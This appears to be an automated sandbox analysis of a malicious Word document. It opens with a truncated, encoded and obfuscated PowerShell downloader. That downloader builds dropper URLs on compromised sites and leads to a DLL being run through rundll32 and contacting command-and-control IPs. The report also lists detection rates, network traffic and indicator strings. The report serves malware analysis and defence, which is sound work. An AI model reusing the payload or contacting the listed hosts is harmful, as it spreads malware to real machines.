xAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApA

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: rycomputer.com	Virustotal: Detection: 11%	Perma Link
Source: 00zyku.com	Virustotal: Detection: 7%	Perma Link
Source: wheelcomoving.com	Virustotal: Detection: 7%	Perma Link
Source: d-cem.com	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll	Metadefender: Detection: 63%			Perma Link
Source: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Show sources

Source: Informacion_29.doc	Virustotal: Detection: 62%			Perma Link
Source: Informacion_29.doc	ReversingLabs: Detection: 79%

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_034375AE CryptDecodeObjectEx,

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: unknown	HTTPS traffic detected: 58.97.195.135:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.169.246:443 -> 192.168.2.3:49723 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.290931845.0000018A2C3AD000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb* source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbJ source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source:	Binary string: B:\cliprgn_src\Release\ClipRgn.pdb source: rundll32.exe, 0000000D.00000002.285896384.0000000010042000.00000002.00020000.sdmp, Q27V.dll.4.dr
Source:	Binary string: System.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.290651149.0000018A2C320000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_100272AB FindFirstFileExW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_10026EEF FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343109C FindFirstFileW,

Source: global traffic

DNS query: name: wheelcomoving.com

Source: global traffic

TCP traffic: 192.168.2.3:49722 -> 58.97.195.135:443

Source: global traffic

TCP traffic: 192.168.2.3:49711 -> 66.85.46.76:80

Networking:

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide8x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ke
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide8x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ke0
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/" rel="bookmark" title="WHAT TO AVOID ON A KETOGENIC DIET \| What is Ketogenic Diet?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT TO AVOID ON A KETOGENIC DIET \| What is Ketogenic Diet?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/" rel="bookmark" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-eating-daniela-diaries/" rel="bookmark" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-programme-free-all-access-pass/" rel="bookmark" title="Beyond Keto Virtual Summit – The Mid-Life Re-Life Blueprint Programme – Free All Access Pass"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Beyond Keto Virtual Summit – The Mid-Life Re-Life Blueprint Programme – Free All Access Pass"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/" rel="bookmark" title="The Ketonian Cookbook – QUICK AND EASY LOW CARB"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ketonian Cookbook – QUICK AND EASY LOW CARB"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></span></a></div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide0
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in memory: type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="" class="btIcoHolder"></a></div>
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in memory: <li id="menu-item-1598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-1598"><a title="" href="https://wheelcomoving.com/">Home</a></li><li id="menu-item-2113" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2113"><a href="https://wheelcomoving.com/track-and-trace/">TRACK AND TRACE</a></li><li id="menu-item-1158" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in memory: https://rycomputer.com/content/TL/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in memory: https://phawayagency.com/wp-admin/mXo4b/

Source: global traffic

TCP traffic: 192.168.2.3:49755 -> 138.197.99.250:8080

Source: global traffic	HTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 66.85.46.76 66.85.46.76
Source: Joe Sandbox View	IP Address: 152.170.79.100 152.170.79.100

Source: Joe Sandbox View	ASN Name: HOST4GEEKS-LLCUS HOST4GEEKS-LLCUS
Source: Joe Sandbox View	ASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
Source: Joe Sandbox View	ASN Name: TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH
Source: Joe Sandbox View	ASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1DNT: 0Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1CxtnUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 138.197.99.250:8080Content-Length: 6500Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown	TCP traffic detected without corresponding DNS query: 190.247.139.101
Source: unknown	TCP traffic detected without corresponding DNS query: 190.247.139.101
Source: unknown	TCP traffic detected without corresponding DNS query: 190.247.139.101
Source: unknown	TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: unknown	TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: unknown	TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: unknown	TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: unknown	TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: unknown	TCP traffic detected without corresponding DNS query: 138.197.99.250

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_0344023A InternetReadFile,

Source: global traffic	HTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive

Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="" class="btIcoHolder"></a></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="" class="btIcoHolder"></a></div> equals www.twitter.com (Twitter)

Source: unknown

DNS traffic detected: queries for: wheelcomoving.com

Source: unknown

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Jan 2021 10:52:58 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, Keep-AliveVary: Accept-EncodingKeep-Alive: timeout=5, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 0d 0a 09 0d 0a Data Ascii: 32<!DOCTYPE html><html lang="en-US"><head>

Source: powershell.exe, 00000004.00000002.289183876.0000018A152D0000.00000004.00000001.sdmp	String found in binary or memory: http://00zyku.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in binary or memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000004.00000002.289171312.0000018A152BB000.00000004.00000001.sdmp	String found in binary or memory: http://00zyku.comx
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp	String found in binary or memory: http://138.197.99.250:8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp	String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/
Source: rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmp	String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/(
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp	String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/7
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp	String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/T
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp	String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/V
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp	String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/e
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp	String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/gss
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp	String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/s
